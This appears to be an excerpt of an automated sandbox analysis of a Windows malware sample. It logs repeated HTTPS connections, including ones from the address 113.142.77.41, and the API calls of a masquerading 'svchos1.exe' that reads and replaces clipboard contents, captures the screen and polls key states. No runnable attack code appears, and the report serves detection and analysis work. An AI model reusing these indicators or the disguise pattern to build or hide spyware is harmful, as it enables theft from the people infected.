          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
          Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
          Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
          Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
          Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50347
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
          Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
          Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
          Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50355
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
          Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
          Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
          Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50362
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50366
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
          Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
          Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
          Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
          Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
          Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
          Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
          Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
          Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
          Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
          Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
          Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
          Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
          Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
          Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
          Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
          Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
          Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
          Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
          Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
          Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
          Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50387 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
          Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownHTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49693 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49699 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49698 version: TLS 1.2
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C2770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,28_2_035C2770
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C2770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,28_2_035C2770
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C26B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,28_2_035C26B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C29D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,28_2_035C29D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035D6F10 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,28_2_035D6F10
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03082770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,29_2_03082770
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030826B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,29_2_030826B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030829D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,29_2_030829D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03096F10 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,29_2_03096F10
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C2770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,28_2_035C2770
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_01041270 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,ReleaseDC,CreateCompatibleBitmap,ReleaseDC,DeleteDC,SelectObject,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,ReleaseDC,29_2_01041270
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006D8611 __EH_prolog3_GS,GetParent,GetParent,GetParent,UpdateWindow,SetCursor,GetAsyncKeyState,UpdateWindow,InflateRect,SetCapture,SetCursor,IsWindow,GetCursorPos,ScreenToClient,PtInRect,RedrawWindow,GetParent,GetParent,GetParent,RedrawWindow,RedrawWindow,GetParent,GetParent,GetParent,InvalidateRect,UpdateWindow,UpdateWindow,SetCapture,RedrawWindow,28_2_006D8611
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007141AC MessageBeep,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,28_2_007141AC
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_00740336 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,PtInRect,GetTickCount,ReleaseCapture,28_2_00740336
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006E8934 SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,28_2_006E8934
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_00714D6C GetParent,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,28_2_00714D6C
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006F2E39 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,28_2_006F2E39
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_00740ECC __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,_memset,_free,SendMessageW,GetParent,28_2_00740ECC
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006F0F32 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,28_2_006F0F32
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072D10D GetKeyState,GetKeyState,GetKeyState,GetKeyState,28_2_0072D10D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0075D272 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,28_2_0075D272
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007141AC MessageBeep,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,29_2_007141AC
